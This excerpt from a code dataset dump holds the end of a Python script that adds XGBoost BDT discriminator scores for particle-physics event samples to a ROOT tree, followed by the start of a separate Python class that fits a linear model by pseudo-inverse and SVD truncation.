xgb.DMatrix(x_test_multi_emuHighTTZBDT, label=y_test_multi_emuHighTTZBDT)\n\ty_pred_multi_emuHighTTZBDT = model_multi_emuHighTTZBDT.predict(d_test_multi_emuHighTTZBDT)\n\n\td_test_multi_emu = xgb.DMatrix(x_test_multi_emu, label=y_test_multi_emu)\n\ty_pred_multi_emu = model_multi_emu.predict(d_test_multi_emu)\n\n\td_test_multi_OffZHighTTZBDT = xgb.DMatrix(x_test_multi_OffZHighTTZBDT, label=y_test_multi_OffZHighTTZBDT)\n\ty_pred_multi_OffZHighTTZBDT = model_multi_OffZHighTTZBDT.predict(d_test_multi_OffZHighTTZBDT)\n\n\td_test_multi_OffZ = xgb.DMatrix(x_test_multi_OffZ, label=y_test_multi_OffZ)\n\ty_pred_multi_OffZ = model_multi_OffZ.predict(d_test_multi_OffZ)\n\t#print y_pred\n\t##########################################################\n\t# make histogram of discriminator value for signal and bkg\n\t##########################################################\n\ty_frame_ttzzz_bVeto = pd.DataFrame({'truth':y_test_ttzzz_bVeto, 'disc':y_pred_ttzzz_bVeto})\n\ty_frame_ttzzz_emu = pd.DataFrame({'truth':y_test_ttzzz_emu, 'disc':y_pred_ttzzz_emu})\n\ty_frame_ttzzz_OffZ = pd.DataFrame({'truth':y_test_ttzzz_OffZ, 'disc':y_pred_ttzzz_OffZ})\n\ty_frame_zz_emu = pd.DataFrame({'truth':y_test_zz_emu, 'disc':y_pred_zz_emu})\n\ty_frame_zz_emuHighTTZBDT = 
pd.DataFrame({'truth':y_test_zz_emuHighTTZBDT, 'disc':y_pred_zz_emuHighTTZBDT})\n\ty_frame_zz_OffZ = pd.DataFrame({'truth':y_test_zz_OffZ, 'disc':y_pred_zz_OffZ})\n\ty_frame_zz_OffZHighTTZBDT = pd.DataFrame({'truth':y_test_zz_OffZHighTTZBDT, 'disc':y_pred_zz_OffZHighTTZBDT})\n\ty_frame_ttz_nbAll = pd.DataFrame({'truth':y_test_ttz_nbAll, 'disc':y_pred_ttz_nbAll})\n\ty_frame_ttz_bVeto = pd.DataFrame({'truth':y_test_ttz_bVeto, 'disc':y_pred_ttz_bVeto})\n\ty_frame_ttz_emu = pd.DataFrame({'truth':y_test_ttz_emu, 'disc':y_pred_ttz_emu})\n\ty_frame_ttz_OffZ = pd.DataFrame({'truth':y_test_ttz_OffZ, 'disc':y_pred_ttz_OffZ})\n\ty_frame_multi_nbAll = pd.DataFrame({'truth':y_test_multi_nbAll, 'disc':y_pred_multi_nbAll})\n\ty_frame_multi_emuHighTTZBDT = pd.DataFrame({'truth':y_test_multi_emuHighTTZBDT, 'disc':y_pred_multi_emuHighTTZBDT})\n\ty_frame_multi_emu = pd.DataFrame({'truth':y_test_multi_emu, 'disc':y_pred_multi_emu})\n\ty_frame_multi_OffZHighTTZBDT = pd.DataFrame({'truth':y_test_multi_OffZHighTTZBDT, 'disc':y_pred_multi_OffZHighTTZBDT})\n\ty_frame_multi_OffZ = pd.DataFrame({'truth':y_test_multi_OffZ, 'disc':y_pred_multi_OffZ})\n\tdisc_ttzzz_bVeto = y_frame_ttzzz_bVeto[y_frame_ttzzz_bVeto['truth'] == 0]['disc'].values\n\tdisc_ttzzz_emu = y_frame_ttzzz_emu[y_frame_ttzzz_emu['truth'] == 0]['disc'].values\n\tdisc_ttzzz_OffZ = y_frame_ttzzz_OffZ[y_frame_ttzzz_OffZ['truth'] == 0]['disc'].values\n\tdisc_zz_emu = y_frame_zz_emu[y_frame_zz_emu['truth'] == 0]['disc'].values\n\tdisc_zz_emuHighTTZBDT = y_frame_zz_emuHighTTZBDT[y_frame_zz_emuHighTTZBDT['truth'] == 0]['disc'].values\n\tdisc_zz_OffZ = y_frame_zz_OffZ[y_frame_zz_OffZ['truth'] == 0]['disc'].values\n\tdisc_zz_OffZHighTTZBDT = y_frame_zz_OffZHighTTZBDT[y_frame_zz_OffZHighTTZBDT['truth'] == 0]['disc'].values\n\tdisc_ttz_nbAll = y_frame_ttz_nbAll[y_frame_ttz_nbAll['truth'] == 0]['disc'].values\n\tdisc_ttz_bVeto = y_frame_ttz_bVeto[y_frame_ttz_bVeto['truth'] == 0]['disc'].values\n\tdisc_ttz_emu = y_frame_ttz_emu[y_frame_ttz_emu['truth'] == 0]['disc'].values\n\tdisc_ttz_OffZ = y_frame_ttz_OffZ[y_frame_ttz_OffZ['truth'] == 0]['disc'].values\n\tdisc_multi_nbAll = y_frame_multi_nbAll[y_frame_multi_nbAll['truth'] == 0]['disc'].values\n\tdisc_multi_emuHighTTZBDT = y_frame_multi_emuHighTTZBDT[y_frame_multi_emuHighTTZBDT['truth'] == 0]['disc'].values\n\tdisc_multi_emu = y_frame_multi_emu[y_frame_multi_emu['truth'] == 0]['disc'].values\n\tdisc_multi_OffZHighTTZBDT = y_frame_multi_OffZHighTTZBDT[y_frame_multi_OffZHighTTZBDT['truth'] == 0]['disc'].values\n\tdisc_multi_OffZ = y_frame_multi_OffZ[y_frame_multi_OffZ['truth'] == 0]['disc'].values\n\n\tif mkplot == \"yes\":\n\t\tplt.figure()\n\t\tplt.hist(disc_ttzzz_bVeto, density=True, bins=50, alpha=0.3)\n\t\tplt.yscale(\"log\")\n\t\tplt.savefig(plotDir+'scores/BDTscore_ttzzz_bVeto_' + sample + '.png')\n\n\t\tplt.figure()\n\t\tplt.hist(disc_ttzzz_emu, density=True, bins=50, alpha=0.3)\n\t\tplt.yscale(\"log\")\n\t\tplt.savefig(plotDir+'scores/BDTscore_ttzzz_emu_' + sample + '.png')\n\n\t\tplt.figure()\n\t\tplt.hist(disc_ttzzz_OffZ, density=True, bins=50, alpha=0.3)\n\t\tplt.yscale(\"log\")\n\t\tplt.savefig(plotDir+'scores/BDTscore_ttzzz_OffZ_' + sample + '.png')\n\n\t\tplt.figure()\n\t\tplt.hist(disc_zz_emu, density=True, bins=50, alpha=0.3)\n\t\tplt.yscale(\"log\")\n\t\tplt.savefig(plotDir+'scores/BDTscore_zz_emu_' + sample + '.png')\n\n\t\tplt.figure()\n\t\tplt.hist(disc_zz_emuHighTTZBDT, density=True, bins=50, alpha=0.3)\n\t\tplt.yscale(\"log\")\n\t\tplt.savefig(plotDir+'scores/BDTscore_zz_emuHighTTZBDT_' + 
sample + '.png')\n\n\t\tplt.figure()\n\t\tplt.hist(disc_zz_OffZ, density=True, bins=50, alpha=0.3)\n\t\tplt.yscale(\"log\")\n\t\tplt.savefig(plotDir+'scores/BDTscore_zz_OffZ_' + sample + '.png')\n\n\t\tplt.figure()\n\t\tplt.hist(disc_zz_OffZHighTTZBDT, density=True, bins=50, alpha=0.3)\n\t\tplt.yscale(\"log\")\n\t\tplt.savefig(plotDir+'scores/BDTscore_zz_OffZHighTTZBDT_' + sample + '.png')\n\n\t\tplt.figure()\n\t\tplt.hist(disc_ttz_nbAll, density=True, bins=50, alpha=0.3)\n\t\tplt.yscale(\"log\")\n\t\tplt.savefig(plotDir+'scores/BDTscore_ttz_nbAll_' + sample + '.png')\n\n\t\tplt.figure()\n\t\tplt.hist(disc_ttz_bVeto, density=True, bins=50, alpha=0.3)\n\t\tplt.yscale(\"log\")\n\t\tplt.savefig(plotDir+'scores/BDTscore_ttz_bVeto_' + sample + '.png')\n\n\t\tplt.figure()\n\t\tplt.hist(disc_ttz_emu, density=True, bins=50, alpha=0.3)\n\t\tplt.yscale(\"log\")\n\t\tplt.savefig(plotDir+'scores/BDTscore_ttz_emu_' + sample + '.png')\n\n\t\tplt.figure()\n\t\tplt.hist(disc_ttz_OffZ, density=True, bins=50, alpha=0.3)\n\t\tplt.yscale(\"log\")\n\t\tplt.savefig(plotDir+'scores/BDTscore_ttz_OffZ_' + sample + '.png')\n\n\t\tplt.figure()\n\t\tplt.figure()\n\t\tplt.hist(disc_multi_nbAll, density=True, bins=50, alpha=0.3)\n\t\tplt.yscale(\"log\")\n\t\tplt.savefig(plotDir+'scores/BDTscore_multi_nbAll_' + sample + '.png')\n\n\t\tplt.figure()\n\t\tplt.hist(disc_multi_emuHighTTZBDT, density=True, bins=50, alpha=0.3)\n\t\tplt.yscale(\"log\")\n\t\tplt.savefig(plotDir+'scores/BDTscore_multi_emuHighTTZBDT_' + sample + '.png')\n\n\t\tplt.figure()\n\t\tplt.hist(disc_multi_emu, density=True, bins=50, alpha=0.3)\n\t\tplt.yscale(\"log\")\n\t\tplt.savefig(plotDir+'scores/BDTscore_multi_emu_' + sample + '.png')\n\n\t\tplt.figure()\n\t\tplt.hist(disc_multi_OffZHighTTZBDT, density=True, bins=50, alpha=0.3)\n\t\tplt.yscale(\"log\")\n\t\tplt.savefig(plotDir+'scores/BDTscore_multi_OffZHighTTZBDT_' + sample + '.png')\n\t\tos.system(\"chmod 755 \"+plotDir+\"scores/*\")\n\n\t\tplt.figure()\n\t\tplt.hist(disc_multi_OffZ, density=True, bins=50, alpha=0.3)\n\t\tplt.yscale(\"log\")\n\t\tplt.savefig(plotDir+'scores/BDTscore_multi_OffZ_' + sample + '.png')\n\t\tos.system(\"chmod 755 \"+plotDir+\"scores/*\")\n\t#############################################\n\t##Creating a new TTree with the discriminator\n\t#############################################\n\n\tch = root.TChain(\"t\")\n\tch.Add(FileName)\n\tif filterBDTvariables == 
\"yes\":\n\t\tch.SetBranchStatus(\"lep_Z_idx0\",0)\n\t\tch.SetBranchStatus(\"lep_Z_idx1\",0)\n\t\tch.SetBranchStatus(\"lep_N_idx0\",0)\n\t\tch.SetBranchStatus(\"lep_N_idx1\",0)\n\t\tch.SetBranchStatus(\"eventweight\",0)\n\t\tch.SetBranchStatus(\"lepsf\",0)\n\t\tch.SetBranchStatus(\"MllN\",0)\n\t\tch.SetBranchStatus(\"MllZ\",0)\n\t\tch.SetBranchStatus(\"ZPt\",0)\n\t\tch.SetBranchStatus(\"lep1Pt\",0)\n\t\tch.SetBranchStatus(\"lep2Pt\",0)\n\t\tch.SetBranchStatus(\"lep3Pt\",0)\n\t\tch.SetBranchStatus(\"lep4Pt\",0)\n\t\tch.SetBranchStatus(\"lep3Id\",0)\n\t\tch.SetBranchStatus(\"lep4Id\",0)\n\t\tch.SetBranchStatus(\"lep3MT\",0)\n\t\tch.SetBranchStatus(\"lep4MT\",0)\n\t\tch.SetBranchStatus(\"lep34MT\",0)\n\t\tch.SetBranchStatus(\"lep1dZ\",0)\n\t\tch.SetBranchStatus(\"lep2dZ\",0)\n\t\tch.SetBranchStatus(\"lep3dZ\",0)\n\t\tch.SetBranchStatus(\"lep4dZ\",0)\n\t\tch.SetBranchStatus(\"pt_zeta\",0)\n\t\tch.SetBranchStatus(\"pt_zeta_vis\",0)\n\t\tch.SetBranchStatus(\"phi0\",0)\n\t\tch.SetBranchStatus(\"phi\",0)\n\t\tch.SetBranchStatus(\"phiH\",0)\n\t\tch.SetBranchStatus(\"theta0\",0)\n\t\tch.SetBranchStatus(\"theta1\",0)\n\t\tch.SetBranchStatus(\"theta2\",0)\n\t\tch.SetBranchStatus(\"minDRJetToLep3\",0)\n\t\tch.SetBranchStatus(\"minDRJetToLep4\",0)\n\t\tch.SetBranchStatus(\"jet1Pt\",0)\n\t\tch.SetBranchStatus(\"jet2Pt\",0)\n\t\tch.SetBranchStatus(\"jet3Pt\",0)\n\t\tch.SetBranchStatus(\"jet4Pt\",0)\n\t\tch.SetBranchStatus(\"jet1BtagScore\",0)\n\t\tch.SetBranchStatus(\"jet2BtagScore\",0)\n\t\tch.SetBranchStatus(\"jet3BtagScore\",0)\n\t\tch.SetBranchStatus(\"jet4BtagScore\",0)\n\tnEntries = ch.GetEntries()\n\tprint(\"nEntries = \"+str(nEntries))\n\toutFile = fileDir+\".BDT/\"+sample\n\tnewFile = root.TFile(outFile,\"RECREATE\") \n\tch_new = ch.CloneTree(0)\n\n\troot.gROOT.ProcessLine(\"struct MyStruct_ttzzz_bVeto{float disc_ttzzz_bVeto;};\")\n\troot.gROOT.ProcessLine(\"struct MyStruct_ttzzz_emu{float disc_ttzzz_emu;};\")\n\troot.gROOT.ProcessLine(\"struct MyStruct_ttzzz_OffZ{float disc_ttzzz_OffZ;};\")\n\troot.gROOT.ProcessLine(\"struct MyStruct_zz_emu{float disc_zz_emu;};\")\n\troot.gROOT.ProcessLine(\"struct MyStruct_zz_emuHighTTZBDT{float disc_zz_emuHighTTZBDT;};\")\n\troot.gROOT.ProcessLine(\"struct MyStruct_zz_OffZ{float disc_zz_OffZ;};\")\n\troot.gROOT.ProcessLine(\"struct MyStruct_zz_OffZHighTTZBDT{float disc_zz_OffZHighTTZBDT;};\")\n\troot.gROOT.ProcessLine(\"struct MyStruct_ttz_nbAll{float disc_ttz_nbAll;};\")\n\troot.gROOT.ProcessLine(\"struct MyStruct_ttz_bVeto{float disc_ttz_bVeto;};\")\n\troot.gROOT.ProcessLine(\"struct MyStruct_ttz_emu{float disc_ttz_emu;};\")\n\troot.gROOT.ProcessLine(\"struct MyStruct_ttz_OffZ{float disc_ttz_OffZ;};\")\n\troot.gROOT.ProcessLine(\"struct MyStruct_multi_nbAll{float disc_multi_nbAll;};\")\n\troot.gROOT.ProcessLine(\"struct MyStruct_multi_emuHighTTZBDT{float disc_multi_emuHighTTZBDT;};\")\n\troot.gROOT.ProcessLine(\"struct MyStruct_multi_emu{float disc_multi_emu;};\")\n\troot.gROOT.ProcessLine(\"struct MyStruct_multi_OffZHighTTZBDT{float disc_multi_OffZHighTTZBDT;};\")\n\troot.gROOT.ProcessLine(\"struct MyStruct_multi_OffZ{float disc_multi_OffZ;};\")\n\n\tfrom ROOT import MyStruct_ttzzz_bVeto\n\tfrom ROOT import MyStruct_ttzzz_emu\n\tfrom ROOT import MyStruct_ttzzz_OffZ\n\tfrom ROOT import MyStruct_zz_emu\n\tfrom ROOT import MyStruct_zz_emuHighTTZBDT\n\tfrom ROOT import MyStruct_zz_OffZ\n\tfrom ROOT import MyStruct_zz_OffZHighTTZBDT\n\tfrom ROOT import MyStruct_ttz_nbAll\n\tfrom ROOT import MyStruct_ttz_bVeto\n\tfrom ROOT import MyStruct_ttz_emu\n\tfrom ROOT 
import MyStruct_ttz_OffZ\n\tfrom ROOT import MyStruct_multi_nbAll\n\tfrom ROOT import MyStruct_multi_emuHighTTZBDT\n\tfrom ROOT import MyStruct_multi_emu\n\tfrom ROOT import MyStruct_multi_OffZHighTTZBDT\n\tfrom ROOT import MyStruct_multi_OffZ\n\n\t# Create branches in the tree\n\ts_ttzzz_bVeto = MyStruct_ttzzz_bVeto()\n\ts_ttzzz_emu = MyStruct_ttzzz_emu()\n\ts_ttzzz_OffZ = MyStruct_ttzzz_OffZ()\n\ts_zz_emu = MyStruct_zz_emu()\n\ts_zz_emuHighTTZBDT = MyStruct_zz_emuHighTTZBDT()\n\ts_zz_OffZ = MyStruct_zz_OffZ()\n\ts_zz_OffZHighTTZBDT = MyStruct_zz_OffZHighTTZBDT()\n\ts_ttz_nbAll = MyStruct_ttz_nbAll()\n\ts_ttz_bVeto = MyStruct_ttz_bVeto()\n\ts_ttz_emu = MyStruct_ttz_emu()\n\ts_ttz_OffZ = MyStruct_ttz_OffZ()\n\ts_multi_nbAll = MyStruct_multi_nbAll()\n\ts_multi_emuHighTTZBDT = MyStruct_multi_emuHighTTZBDT()\n\ts_multi_emu = MyStruct_multi_emu()\n\ts_multi_OffZHighTTZBDT = MyStruct_multi_OffZHighTTZBDT()\n\ts_multi_OffZ = MyStruct_multi_OffZ()\n\n\tbpt_ttzzz_bVeto = ch_new.Branch('disc_ttzzz_bVeto',root.AddressOf(s_ttzzz_bVeto,'disc_ttzzz_bVeto'),'disc_ttzzz_bVeto/F');\n\tbpt_ttzzz_emu = ch_new.Branch('disc_ttzzz_emu',root.AddressOf(s_ttzzz_emu,'disc_ttzzz_emu'),'disc_ttzzz_emu/F');\n\tbpt_ttzzz_OffZ = ch_new.Branch('disc_ttzzz_OffZ',root.AddressOf(s_ttzzz_OffZ,'disc_ttzzz_OffZ'),'disc_ttzzz_OffZ/F');\n\tbpt_zz_emu = ch_new.Branch('disc_zz_emu',root.AddressOf(s_zz_emu,'disc_zz_emu'),'disc_zz_emu/F');\n\tbpt_zz_emuHighTTZBDT = ch_new.Branch('disc_zz_emuHighTTZBDT',root.AddressOf(s_zz_emuHighTTZBDT,'disc_zz_emuHighTTZBDT'),'disc_zz_emuHighTTZBDT/F');\n\tbpt_zz_OffZ = ch_new.Branch('disc_zz_OffZ',root.AddressOf(s_zz_OffZ,'disc_zz_OffZ'),'disc_zz_OffZ/F');\n\tbpt_zz_OffZHighTTZBDT = ch_new.Branch('disc_zz_OffZHighTTZBDT',root.AddressOf(s_zz_OffZHighTTZBDT,'disc_zz_OffZHighTTZBDT'),'disc_zz_OffZHighTTZBDT/F');\n\tbpt_ttz_nbAll = ch_new.Branch('disc_ttz_nbAll',root.AddressOf(s_ttz_nbAll,'disc_ttz_nbAll'),'disc_ttz_nbAll/F');\n\tbpt_ttz_bVeto = ch_new.Branch('disc_ttz_bVeto',root.AddressOf(s_ttz_bVeto,'disc_ttz_bVeto'),'disc_ttz_bVeto/F');\n\tbpt_ttz_emu = ch_new.Branch('disc_ttz_emu',root.AddressOf(s_ttz_emu,'disc_ttz_emu'),'disc_ttz_emu/F');\n\tbpt_ttz_OffZ = ch_new.Branch('disc_ttz_OffZ',root.AddressOf(s_ttz_OffZ,'disc_ttz_OffZ'),'disc_ttz_OffZ/F');\n\tbpt_multi_nbAll = ch_new.Branch('disc_multi_nbAll',root.AddressOf(s_multi_nbAll,'disc_multi_nbAll'),'disc_multi_nbAll/F');\n\tbpt_multi_emuHighTTZBDT = ch_new.Branch('disc_multi_emuHighTTZBDT',root.AddressOf(s_multi_emuHighTTZBDT,'disc_multi_emuHighTTZBDT'),'disc_multi_emuHighTTZBDT/F');\n\tbpt_multi_emu = ch_new.Branch('disc_multi_emu',root.AddressOf(s_multi_emu,'disc_multi_emu'),'disc_multi_emu/F');\n\tbpt_multi_OffZHighTTZBDT = ch_new.Branch('disc_multi_OffZHighTTZBDT',root.AddressOf(s_multi_OffZHighTTZBDT,'disc_multi_OffZHighTTZBDT'),'disc_multi_OffZHighTTZBDT/F');\n\tbpt_multi_OffZ = ch_new.Branch('disc_multi_OffZ',root.AddressOf(s_multi_OffZ,'disc_multi_OffZ'),'disc_multi_OffZ/F');\n\n\tfor i in range(nEntries):\n\t\tch.GetEntry(i)\n\t\tif i%10000==0:\n\t\t\tprint(\"Processing event nr. 
\"+str(i)+\" of \" + str (nEntries))\n\t\ts_ttzzz_bVeto.disc_ttzzz_bVeto = disc_ttzzz_bVeto[i]\n\t\ts_ttzzz_emu.disc_ttzzz_emu = disc_ttzzz_emu[i]\n\t\ts_ttzzz_OffZ.disc_ttzzz_OffZ = disc_ttzzz_OffZ[i]\n\t\ts_zz_emu.disc_zz_emu = disc_zz_emu[i]\n\t\ts_zz_emuHighTTZBDT.disc_zz_emuHighTTZBDT = disc_zz_emuHighTTZBDT[i]\n\t\ts_zz_OffZ.disc_zz_OffZ = disc_zz_OffZ[i]\n\t\ts_zz_OffZHighTTZBDT.disc_zz_OffZHighTTZBDT = disc_zz_OffZHighTTZBDT[i]\n\t\ts_ttz_nbAll.disc_ttz_nbAll = disc_ttz_nbAll[i]\n\t\ts_ttz_bVeto.disc_ttz_bVeto = disc_ttz_bVeto[i]\n\t\ts_ttz_emu.disc_ttz_emu = disc_ttz_emu[i]\n\t\ts_ttz_OffZ.disc_ttz_OffZ = disc_ttz_OffZ[i]\n\t\ts_multi_nbAll.disc_multi_nbAll = disc_multi_nbAll[i]\n\t\ts_multi_emuHighTTZBDT.disc_multi_emuHighTTZBDT = disc_multi_emuHighTTZBDT[i]\n\t\ts_multi_emu.disc_multi_emu = disc_multi_emu[i]\n\t\ts_multi_OffZHighTTZBDT.disc_multi_OffZHighTTZBDT = disc_multi_OffZHighTTZBDT[i]\n\t\ts_multi_OffZ.disc_multi_OffZ = disc_multi_OffZ[i]\n\t\tch_new.Fill()\n\tch_new.GetCurrentFile().Write()\n\tNevents.Write()\n\tch_new.GetCurrentFile().Close()\n\t\n\t\n","sub_path":"scripts/bdt_looper/xgboost/python/append_xgboost_discriminator_to_tree.py","file_name":"append_xgboost_discriminator_to_tree.py","file_ext":"py","file_size_in_byte":24995,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"120021255","text":"\nimport scipy\nimport numpy as np\nimport time\nimport sys\n#Resources\n#https://www.kaggle.com/carrie1/ecommerce-data/data\n#https://archive.ics.uci.edu/ml/machine-learning-databases/00396/\n#https://archive.ics.uci.edu/ml/datasets/Sales_Transactions_Dataset_Weekly\n#https://www.youtube.com/watch?v=eHqhJylvIs4&app=desktop\n\n# PhD. Vaibhav\n# Victor\n\n# TODO: Regularization to prevent overfitting * CHECK!\n# Synthesis of another dataset?\n# Make sure that the math absolutely checks out?\n# Understand the meaning of \"concepts\" in SVD\n# Provide better print statements for a better understanding of data\n\n\n# Do a write up with references to the code\n# Remove bias from the dataset; in particular, omit if 2 standard deviations below the mean\n# Get a quantifiable answer to Bias\n\nclass QLearn:\n\n\n    def __init__ (self, threshold=0.5, svd=False, regularization=True):\n        self.trained = False\n        self.X = [] # 2d array, first dimension is the data point, second dimension is the values of the data point\n        self.Y = []\n        \n        self.threshold = threshold\n        self.regularization = regularization\n        self.regularization_rate = 1\n        \n        self.pinv_time = 0\n        self.svd = svd\n        self.svd_time = 0\n    \n    \n    #----------------------- Training -------------------------\n\n    \"\"\"\n    Deprecated\n    \"\"\"\n    \"\"\"\n    def add_data_point (self, x, y):\n        self.X.append (x)\n        self.Y.append (y)\n    \"\"\"\n\n\n    def set_training_data (self, input, output):\n        self.X = input\n        self.Y = output\n\n    def train (self, X=None, Y=None):\n        if X is None and Y is None:\n            X = self.X\n            Y = self.Y\n        \n        X1 = np.matrix (X).transpose().tolist()\n        \"\"\"\n        print (\"X1\")\n        print (\"(Length x width)\")\n        print (\"(\"+str(len(X1))+\" x \"+str(len(X1[0]))+\")\")\n        \"\"\"\n        Y1 = np.matrix (Y).transpose().tolist()\n        \"\"\"\n        print (\"Y1\")\n        \n        print (\"(Length x width)\")\n        print (\"(\"+str(len(Y1))+\" x \"+str(len(Y1[0]))+\")\")\n        \"\"\"\n        \n        #\"\"\"\n        # First implementation\n        # Reliable and computationally faster than SVD\n        \n        start_pinv = time.time()\n        inv = np.linalg.pinv(np.matrix(X1))\n        \"\"\"\n        print (\"X^-1\")\n        print (\"(Length x width)\")\n        print (\"(\"+str(len(inv.tolist()))+\" x \"+str(len(inv.tolist()[0]))+\")\")\n        
\"\"\"\n \n \"\"\"\n Z*X = Y\n Z*X*XT = Y*XT\n Z*(X*XT) * (X*XT+phi*I)^-1 = Y*XT * (X*XT+phi*I)^-1\n Z = Y*XT * (X*XT+phi*I)^-1\n \"\"\"\n \n \"\"\"\n New implementation\n \"\"\"\n #x_times_x_transpose = np.matmul (X1, np.matrix(X1).transpose()).tolist()\n \n #print (\"Completed x times x transpose\")\n \n \"\"\"\n Second (new implementation)\n regularization_matrix = []\n for row in range (0, x_times_x_transpose.shape [0]):\n regularization_matrix.append ([])\n for col in range (0, x_times_x_transpose.shape[1]):\n if (row != col):\n regularization_matrix[row].append (0.0)\n else:\n regularization_matrix[row].append (self.regularization_rate)\n \n #print (regularization_matrix)\n \n \n x_times_x_transpose_plus_regularization = np.add (x_times_x_transpose, regularization_matrix)\n \n inv = np.matmul (np.matrix(X1).transpose(), np.linalg.inv(x_times_x_transpose_plus_regularization))\n \"\"\"\n \n \"\"\"\n Third (new implementation)\n \"\"\"\n # Uncomment the following\n #for row in range (0, len(x_times_x_transpose)):\n # x_times_x_transpose [row][row] += self.regularization_rate\n \n #inv = np.matmul (np.matrix(X1).transpose(), np.linalg.inv(np.matrix(x_times_x_transpose)))\n \n self.Z = np.matmul(Y1, inv)\n \n end_pinv = time.time()\n print (\"self.Z\")\n print (\"(Length x width)\")\n print (\"(\"+str(len(self.Z.tolist()))+\" x \"+str(len(self.Z.tolist()[0]))+\")\")\n self.trained = True\n print (\"Z Calculation time: \" + str (end_pinv - start_pinv))\n \n if self.svd:\n start_svd = time.time()\n self.decomp = np.linalg.svd (self.Z, full_matrices=False)\n end_svd = time.time ()\n \n U = self.decomp[0]\n singularValues = self.decomp [1]\n VT = self.decomp [2]\n \n \n # Do dimension reduction\n truncated = self.dimension_reduction (U, singularValues, VT)\n self.truncated = (truncated[0], self.createSingularValuesMatrix (truncated[0], truncated[1], truncated[2]), truncated[2])\n print (\"self.truncated\")\n print (\"U = (Length x width), Sigma = (Length x width), VT = (Length x width)\")\n print (\"U = (\"+str(len(self.truncated[0].tolist()))+\" x \"+str(len(self.truncated[0].tolist()[0]))+\")\")\n print (\"Sigma = (\"+str(len(self.truncated[1].tolist()))+\" x \"+str(len(self.truncated[1].tolist()[0]))+\")\")\n print (\"VT = (\"+str(len(self.truncated[2].tolist()))+\" x \"+str(len(self.truncated[2].tolist()[0]))+\")\")\n print (\"SVD Calculation time: \" + str (end_svd - start_svd))\n \n \n #-------------------------- Prediction and testing ------------------\n def try_ktruncations (self, input, output):\n kstart = 1\n kend = 50\n \n total_l2_error = []\n total_l1_error = []\n total_time = []\n #predictions = []\n \n truncations = []\n for i in range (kstart, kend):\n trunc = self.dimension_reduction (self.decomp[0], self.decomp[1], self.decomp[2], i)\n truncations.append ((trunc[0],self.createSingularValuesMatrix (trunc[0], trunc[1], trunc[2]), trunc[2]))\n total_l2_error.append (0)\n total_l1_error.append (0)\n total_time.append (0)\n \n \n for i in range (len (output)):\n for b in range (kstart, kend):\n index = b-kstart\n \n time_start = time.time()\n inp = np.matrix ([input[i]]).transpose()\n mul1 = truncations[index][2] * inp\n mul2 = truncations[index][1]* (mul1)\n mul3 = truncations[index][0]* (mul2)\n out = np.matrix(mul3).transpose().getA()[0].tolist()\n \n time_end = time.time()\n #print (len (out))\n \n total_time[index] += time_end-time_start\n\n prediction = self.regularize (out, self.threshold)\n #predictions.append (prediction)\n total_l2_error[index] += self.l2_error 
(output[i], prediction)\n total_l1_error[index] += self.l1_error (output[i], prediction)\n \n print (\"trunc\\t\\tL2 Err\\t\\tRMSD\\t\\tL1 Err\\t\\tAve Dev\\t\\tTime\")\n \n for b in range (kstart, kend):\n index = b-kstart\n \n average_l2_error = total_l2_error[index] / len (output)\n \n rmsd = (average_l2_error / len (output[0]))**0.5\n \n average_l1_error = total_l1_error[index] / len (output)\n \n average_deviation = (average_l1_error / len (output[0]))\n \n average_time = (total_time[index]/len (input))\n \n print (str (b)+\"\\t\\t\" + str (\"{:6.5f}\".format(average_l2_error)) + \"\\t\" + str (\"{:6.5f}\".format(rmsd)) + \"\\t\\t\" + str (\"{:6.5f}\".format(average_l1_error)) + \"\\t\" + str (\"{:6.5f}\".format(average_deviation)) + \"\\t\\t\" + str (\"{:6.5f}\".format(average_time)))\n \n #coeffs = self.coeff_of_determination (output, predictions)\n #print (\"Coefficients of determination: \" + str (coeffs))\n \n #print (\"[TP, FP, FN, TN]\")\n #cntng_table = self.contingency_table (output, predictions)\n #print (cntng_table[0])\n \n \n def predict (self, input):\n \n \n if (self.trained):\n if (self.svd == False):\n pinv_start = time.time()\n vec = np.matrix(self.Z * np.matrix ([input]).transpose()).transpose().getA()[0].tolist()\n pinv_end = time.time()\n self.pinv_time += pinv_end-pinv_start\n #print (\"Pseudoinverse: \" + str(pinv_end-pinv_start))\n else:\n svd_start = time.time()\n vec = np.matrix(self.truncated[0]* (self.truncated[1]* (self.truncated[2] * np.matrix ([input]).transpose()))).transpose().getA()[0].tolist()\n svd_end = time.time()\n self.svd_time += svd_end-svd_start\n #print (\"SVD: \" +str(svd_end-svd_start))\n \n if (self.regularization):\n return self.regularize (vec, self.threshold)\n else:\n return vec\n else:\n return 0\n \n \"\"\"\n vector: a list of values (typically between 0 and 1)\n threshold: The threshold in which the values must be above to be 0 or 1\n \n Turns values in the list either 1 if it that value is greater than the threshold or\n 0 if smaller than the threshold value.\n \"\"\"\n def regularize (self, vector, threshold):\n for i in range (len (vector)):\n if (vector[i] >= threshold):\n vector[i] = 1\n else:\n vector[i] = 0\n return vector\n\n def test_model (self, input, output, verbose=True):\n \n \n total_l2_error = 0\n total_l1_error = 0\n predictions = []\n \n \n \n for i in range (len (output)):\n prediction = self.predict (input[i])\n predictions.append (prediction)\n err = self.l2_error (output[i], prediction)\n total_l2_error += err\n err = self.l1_error (output[i], prediction)\n total_l1_error += err\n if verbose:\n print (str (i+1)+ \") \")\n print (\"\\tActual\\t\\tPredicted\")\n for prod in range (0, len (output[i])):\n print (\"\\t\"+str(output [i][prod])+\"\\t\\t\"+str(prediction[prod]))\n #print (\"Actual: \" + str(output[i]))\n #print (\"Predicted: \"+ str(prediction))\n print (\"L2 Error: \" + str (err))\n print (\"Std Dev: \" + str ((err/len (output[i])) ** (0.5)))\n print (\"\")\n total_l2_error = total_l2_error / len (output)\n print (\"Average Error L2: \" + str (total_l2_error))\n \n rmsd = (total_l2_error / len (output[0]))**0.5\n print (\"RMSD: \" + str(rmsd))\n \n total_l1_error = total_l1_error / len (output)\n print (\"Average Error L1: \" + str (total_l1_error))\n \n average_deviation = (total_l1_error / len (output[0]))\n print (\"Average Deviation per Query: \" + str(average_deviation))\n\n #coeffs = self.coeff_of_determination (output, predictions)\n #print (\"Coefficients of determination: \" + str 
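# --- Illustrative aside (standalone sketch, not from the original file): the
# commented-out derivation in train() above is ridge-regularized least squares,
#   Z = Y * X^T * (X * X^T + phi * I)^-1,
# which solves Z*X ~= Y while keeping the Gram matrix invertible. Assuming X is
# (features x samples) and Y is (outputs x samples), as in the class above:
import numpy as np

def ridge_weights(X, Y, phi=1.0):
    gram = X @ X.T + phi * np.eye(X.shape[0])  # regularized Gram matrix
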